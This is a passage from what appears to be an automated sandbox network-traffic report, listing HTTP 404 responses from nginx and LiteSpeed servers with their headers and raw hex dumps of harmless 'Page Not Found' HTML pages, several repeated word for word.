63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:04:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:04:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:04:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:04:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:04:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 12 Sep 2024 11:04:24 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 12 Sep 2024 11:04:27 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 